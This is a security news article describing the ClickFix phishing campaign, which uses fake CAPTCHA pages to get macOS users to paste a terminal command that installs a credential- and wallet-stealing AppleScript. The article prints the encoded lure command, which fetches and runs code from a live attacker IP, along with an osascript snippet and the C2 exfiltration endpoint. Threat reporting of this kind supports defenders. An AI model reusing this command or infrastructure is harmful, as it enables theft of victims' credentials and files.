ClickFix Malware Attacks macOS Users to Steal Login Credentials

In recent months, security researchers have observed a novel phishing campaign targeting macOS users under the guise of a CAPTCHA verification process.

This attack, dubbed “ClickFix,” leverages a blend of social engineering and operating system detection to coax victims into executing malicious commands directly in their terminals.

By mimicking legitimate Cloudflare-style checks, the malware avoids dropping traditional binaries, instead relying on base64-encoded scripts that fetch and run an obfuscated AppleScript payload.

Initially, unsuspecting users navigating to a compromised URL—often impersonating popular trading platforms—are presented with a human verification page tailored to their operating system.

Windows visitors receive innocuous PowerShell instructions, while macOS users are instructed to open Terminal, paste a copied command, and press Return.

Forcepoint analysts identified that this subtle divergence in instructions is designed to trick macOS victims into executing a command that decodes and pipes a base64 string into bash:-

echo "Y3VybCAtcyBodHRwOi8vNDUuMTQ2LjEzMC4xMzEvZC92aXB4MTQzNTAgfCBub2h1cCBiYXN0ICY=" 
| base64 -d | bash

Once the command runs, it installs an obfuscated AppleScript compiled file (.scpt) that carries out the core data harvesting activities. The script begins by creating a unique temporary directory under /tmp, using osascript calls to assemble and execute commands:

osascript -e 'run script "on mkdir(item)ntrynset filePath to quoted form of (POSIX path of item)ndo shell script "mkdir -p " & filePathnend trynend mkdir"'

Forcepoint researchers noted that, after directory setup, the malware scans the user’s Desktop, Documents, and Library folders for files with extensions such as .pdf, .docx, .key, and browser-specific artifacts including Keychain databases, Safari cookies, and Apple Notes databases.

The script proceeds to enumerate profiles in Firefox and Chromium-based browsers, copying saved credentials, cookies, form history, and encrypted wallet files for known crypto extensions like MetaMask and Exodus.

Infection Mechanism Deep Dive

The infection mechanism hinges on the manual execution of a seemingly benign “verification” command. By employing base64 encoding, the attackers obscure the payload’s true purpose, bypassing signature-based detection.

When decoded, the payload fetches a highly obfuscated AppleScript from a remote server (hxxp://45.146.130[.]131/d/vipx14350). This AppleScript employs random string obfuscation and nested osascript invocations to hinder static analysis.

Upon execution, it prompts the user for their password to escalate privileges and then collects system profile details via:-

system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType

The harvested data, along with gathered files, is archived into /tmp/out.zip and exfiltrated to the attacker’s C2 endpoint at 45.146.130.131/log.

A cleanup routine then removes the temporary directory to erase traces, complicating forensic recovery.

By combining familiar CAPTCHA prompts with terminal-based social engineering, the ClickFix malware Odyssey stealer demonstrates a sophisticated evasion technique that sidesteps traditional antivirus solutions, emphasizing the need for heightened user awareness and multi-layered endpoint controls.

Equip your SOC with full access to the latest threat data from ANY.RUN TI Lookup that can Improve incident response -> Get 14-day Free Trial